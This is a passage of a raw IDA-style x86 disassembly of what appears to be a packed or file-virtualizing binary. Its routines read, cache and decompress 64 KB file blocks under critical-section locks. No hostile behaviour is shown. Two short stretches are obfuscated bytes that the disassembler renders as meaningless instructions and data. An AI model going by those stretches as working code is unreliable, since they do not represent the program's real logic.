mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_491950
; ---------------------------------------------------------------------------
loc_491A10: ; CODE XREF: sub_491C5C+2F1�p
; sub_492177+1CF�p
push ebp
mov ebp, esp
sub esp, 0ECh
push ebx
push esi
push edi
mov eax, [ebp+0Ch]
mov [ebp-0Ch], eax
mov eax, [ebp+10h]
mov [ebp-10h], eax
mov eax, ds:dword_4A28F8
mov [ebp-4], eax
mov eax, [ebp+8]
mov eax, [eax]
mov eax, [eax]
mov [ebp-8], eax
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz loc_491AD8
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jnz short loc_491AD8
mov eax, [ebp-8]
mov ecx, [ebp+0Ch]
sub ecx, [eax+4]
mov [ebp-14h], ecx
mov eax, [ebp-14h]
xor edx, edx
push 8
pop ecx
div ecx
mov [ebp-18h], edx
cmp dword ptr [ebp-18h], 0
jz short loc_491A93
mov eax, [ebp+0Ch]
sub eax, [ebp-18h]
mov [ebp-0Ch], eax
mov eax, [ebp-10h]
add eax, [ebp-18h]
mov [ebp-10h], eax
mov eax, [ebp-4]
add eax, [ebp-18h]
mov [ebp-4], eax
loc_491A93: ; CODE XREF: _4:00491A76�j
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
test edx, edx
jz short loc_491AB8
mov eax, [ebp-10h]
xor edx, edx
push 8
pop ecx
div ecx
push 8
pop eax
sub eax, edx
mov ecx, [ebp-10h]
add ecx, eax
mov [ebp-10h], ecx
loc_491AB8: ; CODE XREF: _4:00491A9F�j
mov eax, [ebp+8]
mov ecx, [ebp-10h]
add ecx, [eax+4]
mov eax, [ebp-8]
cmp ecx, [eax+8]
jbe short loc_491AD8
mov eax, [ebp-8]
mov ecx, [ebp+8]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp-10h], eax
loc_491AD8: ; CODE XREF: _4:00491A46�j _4:00491A57�j ...
push 0
push 0
push dword ptr [ebp-0Ch]
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_4A2788 ; SetFilePointer
cmp eax, [ebp-0Ch]
jz short loc_491AF7
xor eax, eax
jmp loc_491C55
; ---------------------------------------------------------------------------
loc_491AF7: ; CODE XREF: _4:00491AEE�j
push 0
push dword ptr [ebp+14h]
push dword ptr [ebp-10h]
push ds:dword_4A28F8
mov eax, [ebp+8]
push dword ptr [eax+8]
call ds:dword_4A277C ; ReadFile
test eax, eax
jnz short loc_491B1C
xor eax, eax
jmp loc_491C55
; ---------------------------------------------------------------------------
loc_491B1C: ; CODE XREF: _4:00491B13�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp-10h]
jz short loc_491B2D
xor eax, eax
jmp loc_491C55
; ---------------------------------------------------------------------------
loc_491B2D: ; CODE XREF: _4:00491B24�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz loc_491C3C
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 10h
jnz short loc_491BA9
push offset dword_460000
call sub_48EB7E ; CODE XREF: _4:00491B5B�j
sub eax, 7424E45Ah
db 3Eh
jle short near ptr loc_491B51+3
cmpsb
push edi
fisttp dword ptr [edx+esi*4+61h]
clc
lds ebp, [ecx-26h]
db 2Eh ; CODE XREF: _4:loc_491B99�j
icebp
and eax, 7EFC9E45h
dec edi
jmp short loc_491B99
; ---------------------------------------------------------------------------
dw 4521h
dd 42A5F15Eh, 0DB92843Dh, 0E0C5324Fh, 4CE284DAh, 0C220AB13h
dd 6D611E6Fh, 0A31D6C36h, 90A16E44h, 0E2FDF0E3h
; ---------------------------------------------------------------------------
cmc
loc_491B99: ; CODE XREF: _4:00491B70�j
jmp short near ptr loc_491B68+1
; ---------------------------------------------------------------------------
db 0C1h
db 2 dup(90h)
dw 0C033h
dd 0EE75C085h, 93E9h
db 0
; ---------------------------------------------------------------------------
loc_491BA9: ; CODE XREF: _4:00491B4A�j
mov eax, [ebp-8]
mov eax, [eax+0Ch]
and eax, 30h
cmp eax, 30h
jnz short loc_491C32
push 120000h
call sub_48EB7E
mov esp, 0E59375A9h
lodsd
punpckhwd mm7, mm4
mov bl, 0AEh
xchg eax, edx
enter 493Dh, 20h
add esi, esi
xchg dh, [ebx-683002FDh]
adc [edi-1041F021h], ebx
mov dl, 34h
; ---------------------------------------------------------------------------
db 8Ch, 0F5h, 65h
dd 975D2033h, 0B1BE20AAh, 97A380A4h, 9FC19C8Fh, 2DDFCC3h
dd 0E1EECB75h, 9276A8BBh, 680CACDAh, 31B9E518h, 0ED0915C7h
dd 0DA20F7ABh, 0DB497607h, 758264EEh, 9E554C68h, 0DE8DD8CBh
dd 0CE190CFFh, 0A5B28F65h, 0C0339090h, 0EE75C085h
; ---------------------------------------------------------------------------
jmp short loc_491C3C
; ---------------------------------------------------------------------------
loc_491C32: ; CODE XREF: _4:00491BB5�j
mov ecx, 0EF000014h
call sub_499342
loc_491C3C: ; CODE XREF: _4:00491B38�j _4:00491C30�j
mov eax, [ebp+14h]
mov eax, [eax]
cmp eax, [ebp+10h]
jnb short loc_491C4A
xor eax, eax
jmp short loc_491C55
; ---------------------------------------------------------------------------
loc_491C4A: ; CODE XREF: _4:00491C44�j
mov eax, [ebp+14h]
mov ecx, [ebp+10h]
mov [eax], ecx
mov eax, [ebp-4]
loc_491C55: ; CODE XREF: _4:00491AF2�j _4:00491B17�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_491C5C proc near ; CODE XREF: sub_49200B+30�p
; sub_49200B+EB�p
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00491EAD SIZE 0000015E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F3B8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 68h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
mov ecx, ds:dword_4A2908
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
mov [ebp+var_24], eax
and [ebp+var_28], 0
and [ebp+var_40], 0
jmp short loc_491CB0
; ---------------------------------------------------------------------------
loc_491CA9: ; CODE XREF: sub_491C5C:loc_491CED�j
mov eax, [ebp+var_40]
inc eax
mov [ebp+var_40], eax
loc_491CB0: ; CODE XREF: sub_491C5C+4B�j
cmp [ebp+var_40], 3
jnb short loc_491CEF
mov eax, [ebp+var_40]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov eax, ds:dword_4A1B7C[eax]
cmp eax, [ecx]
jnz short loc_491CED
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:dword_4A1B78[eax]
cmp eax, [ebp+arg_4]
jnz short loc_491CED
mov eax, [ebp+var_40]
imul eax, 18h
mov eax, ds:off_4A1B80[eax]
mov eax, [eax]
jmp loc_491FFA
; ---------------------------------------------------------------------------
loc_491CED: ; CODE XREF: sub_491C5C+6B�j
; sub_491C5C+7C�j
jmp short loc_491CA9
; ---------------------------------------------------------------------------
loc_491CEF: ; CODE XREF: sub_491C5C+58�j
lea eax, [ebp+var_48]
push eax
call ds:dword_4A272C ; GetSystemTimeAsFileTime
and [ebp+var_4C], 0
jmp short loc_491D06
; ---------------------------------------------------------------------------
loc_491CFF: ; CODE XREF: sub_491C5C:loc_491D4D�j
mov eax, [ebp+var_4C]
inc eax
mov [ebp+var_4C], eax
loc_491D06: ; CODE XREF: sub_491C5C+A1�j
cmp [ebp+var_4C], 3
jnb short loc_491D4F
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_4A1B70
mov [ebp+var_74], eax
mov eax, [ebp+var_74]
mov ecx, [ebp+var_44]
cmp ecx, [eax+4]
jl short loc_491D4D
jg short loc_491D31
mov eax, [ebp+var_74]
mov ecx, [ebp+var_48]
cmp ecx, [eax]
jbe short loc_491D4D
loc_491D31: ; CODE XREF: sub_491C5C+C9�j
mov eax, [ebp+var_4C]
imul eax, 18h
add eax, offset dword_4A1B70
mov ecx, [eax]
mov [ebp+var_48], ecx
mov eax, [eax+4]
mov [ebp+var_44], eax
mov eax, [ebp+var_4C]
mov [ebp+var_28], eax
loc_491D4D: ; CODE XREF: sub_491C5C+C7�j
; sub_491C5C+D3�j
jmp short loc_491CFF
; ---------------------------------------------------------------------------
loc_491D4F: ; CODE XREF: sub_491C5C+AE�j
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_4A1B78[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
and ds:dword_4A1B7C[eax], 0
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_4A1B70
and dword ptr [eax], 0
and dword ptr [eax+4], 0
mov eax, [ebp+var_28]
imul eax, 18h
mov eax, ds:off_4A1B80[eax]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
cmp dword ptr [ecx+eax+8], 0
jnz loc_491EAD
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_54], eax
and [ebp+var_50], 0
and [ebp+var_4], 0
mov eax, [ebp+var_54]
shl eax, 2
push eax
call sub_49935A
pop ecx
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
mov [ebp+var_50], eax
and [ebp+var_58], 0
mov eax, [ebp+var_54]
shl eax, 2
mov ecx, [ebp+var_34]
mov ecx, [ecx+4]
sub ecx, eax
mov [ebp+var_5C], ecx
push 0
push 0
push [ebp+var_5C]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4A2788 ; SetFilePointer
cmp eax, [ebp+var_5C]
jz short loc_491E1B
push 0FFFFFFFFh
and [ebp+var_78], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_78]
jmp loc_491FFA
; ---------------------------------------------------------------------------
loc_491E1B: ; CODE XREF: sub_491C5C+1A4�j
push 0
lea eax, [ebp+var_58]
push eax
mov eax, [ebp+var_54]
shl eax, 2
push eax
push [ebp+var_50]
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4A277C ; ReadFile
test eax, eax
jnz short loc_491E54
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_491FFA
; ---------------------------------------------------------------------------
loc_491E54: ; CODE XREF: sub_491C5C+1DD�j
mov eax, [ebp+var_54]
shl eax, 2
cmp [ebp+var_58], eax
jz short loc_491E78
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_491FFA
; ---------------------------------------------------------------------------
loc_491E78: ; CODE XREF: sub_491C5C+201�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
mov edx, [ebp+var_50]
mov [ecx+eax+8], edx
and [ebp+var_50], 0
or [ebp+var_4], 0FFFFFFFFh
call sub_491E9D
jmp short loc_491EAD
sub_491C5C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_491E9D proc near ; CODE XREF: sub_491C5C+23A�p
; DATA XREF: _5:0049F3C0�o
mov eax, [ebp-50h]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_4993DD
pop ecx
retn
sub_491E9D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_491C5C
loc_491EAD: ; CODE XREF: sub_491C5C+144�j
; sub_491C5C+23F�j
mov eax, [ebp+var_24]
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
mov eax, [ecx+eax+8]
mov [ebp+var_30], eax
and [ebp+var_20], 0
and [ebp+var_1C], 0
cmp [ebp+arg_4], 0
jz short loc_491F2D
mov eax, [ebp+var_34]
mov eax, [eax+8]
add eax, 0FFFFh
shr eax, 10h
mov [ebp+var_60], eax
mov eax, [ebp+arg_4]
cmp eax, [ebp+var_60]
jb short loc_491F00
push ds:off_49F4F8
push 93h
push ds:off_49F4FC
call sub_49948C
loc_491F00: ; CODE XREF: sub_491C5C+28C�j
and [ebp+var_64], 0
jmp short loc_491F0D
; ---------------------------------------------------------------------------
loc_491F06: ; CODE XREF: sub_491C5C+2CF�j
mov eax, [ebp+var_64]
inc eax
mov [ebp+var_64], eax
loc_491F0D: ; CODE XREF: sub_491C5C+2A8�j
mov eax, [ebp+var_64]
cmp eax, [ebp+arg_4]
jnb short loc_491F2D
mov eax, [ebp+var_64]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
mov ecx, [ebp+var_20]
add ecx, eax
mov [ebp+var_20], ecx
jmp short loc_491F06
; ---------------------------------------------------------------------------
loc_491F2D: ; CODE XREF: sub_491C5C+273�j
; sub_491C5C+2B7�j
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 7FFFFFFFh
push eax
mov eax, [ebp+var_34]
mov eax, [eax+4]
add eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call loc_491A10
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz short loc_491F62
xor eax, eax
jmp loc_491FFA
; ---------------------------------------------------------------------------
loc_491F62: ; CODE XREF: sub_491C5C+2FD�j
mov [ebp+var_2C], 10000h
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4]
and eax, 80000000h
test eax, eax
jnz short loc_491FAE
push [ebp+var_1C]
push [ebp+var_38]
lea eax, [ebp+var_2C]
push eax
push [ebp+var_3C]
call sub_49E9F3
add esp, 10h
mov [ebp+var_68], eax
cmp [ebp+var_68], 0
jz short loc_491FAC
push [ebp+var_68]
push offset aBoxReadcompres ; ":BOX:ReadCompressedSection: decompresio"...
call sub_499726
pop ecx
pop ecx
xor eax, eax
jmp short loc_491FFA
; ---------------------------------------------------------------------------
loc_491FAC: ; CODE XREF: sub_491C5C+33B�j
jmp short loc_491FC5
; ---------------------------------------------------------------------------
loc_491FAE: ; CODE XREF: sub_491C5C+31D�j
mov ecx, [ebp+var_1C]
mov esi, [ebp+var_38]
mov edi, [ebp+var_3C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_491FC5: ; CODE XREF: sub_491C5C:loc_491FAC�j
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_4]
mov ds:dword_4A1B78[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
mov ds:dword_4A1B7C[eax], ecx
mov eax, [ebp+var_28]
imul eax, 18h
add eax, offset dword_4A1B70
push eax
call ds:dword_4A272C ; GetSystemTimeAsFileTime
mov eax, [ebp+var_3C]
loc_491FFA: ; CODE XREF: sub_491C5C+8C�j
; sub_491C5C+1BA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_491C5C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49200B proc near ; CODE XREF: sub_492177+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
shr eax, 10h
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_14]
lea eax, [ecx+eax-1]
shr eax, 10h
mov [ebp+var_4], eax
push [ebp+var_10]
push [ebp+arg_0]
call sub_491C5C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_492050
xor eax, eax
jmp loc_492171
; ---------------------------------------------------------------------------
loc_492050: ; CODE XREF: sub_49200B+3C�j
mov eax, [ebp+var_14]
xor edx, edx
mov ecx, 10000h
div ecx
mov [ebp+var_8], edx
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_492074
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
jmp short loc_49207F
; ---------------------------------------------------------------------------
loc_492074: ; CODE XREF: sub_49200B+5F�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_18], eax
loc_49207F: ; CODE XREF: sub_49200B+67�j
mov ecx, [ebp+var_18]
mov esi, [ebp+var_C]
add esi, [ebp+var_8]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, 10000h
sub eax, [ebp+var_8]
cmp [ebp+arg_8], eax
jnb short loc_4920AE
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
jmp short loc_4920B9
; ---------------------------------------------------------------------------
loc_4920AE: ; CODE XREF: sub_49200B+99�j
mov eax, 10000h
sub eax, [ebp+var_8]
mov [ebp+var_1C], eax
loc_4920B9: ; CODE XREF: sub_49200B+A1�j
mov eax, [ebp+var_1C]
mov [ebp+var_8], eax
loc_4920BF: ; CODE XREF: sub_49200B+15E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jbe loc_49216E
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
ja short loc_4920F0
push ds:off_49F4F8
push 0BBh
push ds:off_49F4FC
call sub_49948C
loc_4920F0: ; CODE XREF: sub_49200B+CD�j
push [ebp+var_10]
push [ebp+arg_0]
call sub_491C5C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_492108
xor eax, eax
jmp short loc_492171
; ---------------------------------------------------------------------------
loc_492108: ; CODE XREF: sub_49200B+F7�j
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_492120
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_20], eax
jmp short loc_492127
; ---------------------------------------------------------------------------
loc_492120: ; CODE XREF: sub_49200B+108�j
mov [ebp+var_20], 10000h
loc_492127: ; CODE XREF: sub_49200B+113�j
mov ecx, [ebp+var_20]
mov esi, [ebp+var_C]
mov edi, [ebp+arg_4]
add edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
cmp eax, 10000h
jnb short loc_492159
mov eax, [ebp+arg_8]
sub eax, [ebp+var_8]
mov [ebp+var_24], eax
jmp short loc_492160
; ---------------------------------------------------------------------------
loc_492159: ; CODE XREF: sub_49200B+141�j
mov [ebp+var_24], 10000h
loc_492160: ; CODE XREF: sub_49200B+14C�j
mov eax, [ebp+var_8]
add eax, [ebp+var_24]
mov [ebp+var_8], eax
jmp loc_4920BF
; ---------------------------------------------------------------------------
loc_49216E: ; CODE XREF: sub_49200B+BA�j
push 1
pop eax
loc_492171: ; CODE XREF: sub_49200B+40�j
; sub_49200B+FB�j
pop edi
pop esi
leave
retn 0Ch
sub_49200B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_492177 proc near ; CODE XREF: sub_49094C+242�p
; sub_490FBF+194�p ...
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0049245D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F3C8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 3Ch
push ebx
push esi
push edi
cmp [ebp+arg_14], 0
jnz short loc_4921A8
lea eax, [ebp+var_1C]
mov [ebp+arg_14], eax
loc_4921A8: ; CODE XREF: sub_492177+29�j
mov eax, ds:dword_4A28E4
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jz short loc_4921C9
mov eax, [ebp+var_3C]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_40], 1
jmp short loc_4921CD
; ---------------------------------------------------------------------------
loc_4921C9: ; CODE XREF: sub_492177+3D�j
and [ebp+var_40], 0
loc_4921CD: ; CODE XREF: sub_492177+50�j
movzx eax, [ebp+var_40]
test eax, eax
jz loc_49245D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_492436
cmp [ebp+arg_10], 0
jz short loc_492207
mov eax, [ebp+arg_10]
mov dword ptr [eax], 3E5h
loc_492207: ; CODE XREF: sub_492177+85�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_492254
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A277C ; ReadFile
mov ecx, [ebp+arg_14]
mov [ecx], eax
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp loc_49245F
; ---------------------------------------------------------------------------
loc_492254: ; CODE XREF: sub_492177+A5�j
cmp [ebp+arg_10], 0
jz short loc_492281
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_492281
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_20]
mov ecx, [ecx+4]
mov [eax+0Ch], ecx
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+8]
mov [eax+4], ecx
loc_492281: ; CODE XREF: sub_492177+E1�j
; sub_492177+F0�j
mov eax, [ebp+arg_8]
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov eax, [eax+4]
add eax, [ebp+arg_8]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_4922A7
mov eax, [ebp+var_30]
mov ecx, [ebp+var_20]
mov eax, [eax+8]
sub eax, [ecx+4]
mov [ebp+var_28], eax
loc_4922A7: ; CODE XREF: sub_492177+11F�j
cmp [ebp+arg_C], 0
jnz short loc_4922B3
lea eax, [ebp+var_2C]
mov [ebp+arg_C], eax
loc_4922B3: ; CODE XREF: sub_492177+134�j
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
cmp [ebp+arg_8], 0
jbe loc_4923B8
cmp [ebp+var_28], 0
jbe loc_4923B8
mov eax, [ebp+var_30]
mov eax, [eax+0Ch]
and eax, 2
test eax, eax
jz short loc_4922FE
push [ebp+var_28]
push [ebp+arg_4]
push [ebp+var_20]
call sub_49200B
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4922F9
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_28]
mov [eax], ecx
loc_4922F9: ; CODE XREF: sub_492177+178�j
jmp loc_4923B6
; ---------------------------------------------------------------------------
loc_4922FE: ; CODE XREF: sub_492177+161�j
and [ebp+var_34], 0
loc_492302: ; CODE XREF: sub_492177+23A�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_4923B6
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_492326
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_4C], eax
jmp short loc_49232D
; ---------------------------------------------------------------------------
loc_492326: ; CODE XREF: sub_492177+1A2�j
mov [ebp+var_4C], 10000h
loc_49232D: ; CODE XREF: sub_492177+1AD�j
push [ebp+arg_C]
push [ebp+var_4C]
mov eax, [ebp+var_30]
mov eax, [eax+4]
mov ecx, [ebp+var_20]
add eax, [ecx+4]
add eax, [ebp+var_34]
push eax
push [ebp+var_20]
call loc_491A10
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jz short loc_49237D
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cmp eax, 10000h
jnb short loc_49236C
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
mov [ebp+var_50], eax
jmp short loc_492373
; ---------------------------------------------------------------------------
loc_49236C: ; CODE XREF: sub_492177+1E8�j
mov [ebp+var_50], 10000h
loc_492373: ; CODE XREF: sub_492177+1F3�j
mov eax, [ebp+arg_C]
mov eax, [eax]
cmp eax, [ebp+var_50]
jz short loc_492383
loc_49237D: ; CODE XREF: sub_492177+1DB�j
and [ebp+var_24], 0
jmp short loc_4923B6
; ---------------------------------------------------------------------------
loc_492383: ; CODE XREF: sub_492177+204�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
mov ecx, [eax]
mov esi, [ebp+var_38]
mov edi, [ebp+arg_4]
add edi, [ebp+var_34]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
add ecx, [eax]
mov [ebp+var_34], ecx
jmp loc_492302
; ---------------------------------------------------------------------------
loc_4923B6: ; CODE XREF: sub_492177:loc_4922F9�j
; sub_492177+191�j ...
jmp short loc_4923C5
; ---------------------------------------------------------------------------
loc_4923B8: ; CODE XREF: sub_492177+146�j
; sub_492177+150�j
mov [ebp+var_24], 1
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
loc_4923C5: ; CODE XREF: sub_492177:loc_4923B6�j
cmp [ebp+var_24], 0
jz short loc_4923DC
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov ecx, [ebp+arg_C]
add eax, [ecx]
mov ecx, [ebp+var_20]
mov [ecx+4], eax
loc_4923DC: ; CODE XREF: sub_492177+252�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_24]
mov [eax], ecx
cmp [ebp+arg_10], 0
jz short loc_49241D
mov eax, [ebp+var_20]
mov eax, [eax+0Ch]
and eax, 40000000h
test eax, eax
jz short loc_49241D
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_10]
mov ecx, [ecx+0Ch]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax+0Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_10]
and dword ptr [eax], 0
loc_49241D: ; CODE XREF: sub_492177+271�j
; sub_492177+280�j
push 0FFFFFFFFh
mov [ebp+var_54], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp short loc_49245F
; ---------------------------------------------------------------------------
loc_492436: ; CODE XREF: sub_492177+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_492441
jmp short loc_49245D
sub_492177 endp
; =============== S U B R O U T I N E =======================================
sub_492441 proc near ; CODE XREF: sub_492177+2C3�p
; DATA XREF: _5:0049F3D0�o
mov eax, ds:dword_4A28E4
mov [ebp-44h], eax
cmp dword ptr [ebp-44h], 0
jz short locret_49245C
mov eax, [ebp-44h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_49245C: ; CODE XREF: sub_492441+C�j
retn
sub_492441 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_492177
loc_49245D: ; CODE XREF: sub_492177+5C�j
; sub_492177+2C8�j
xor eax, eax
loc_49245F: ; CODE XREF: sub_492177+D8�j
; sub_492177+2BD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_492177
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_492470 proc near ; CODE XREF: sub_490252+91�p
; sub_49253F+B4�p
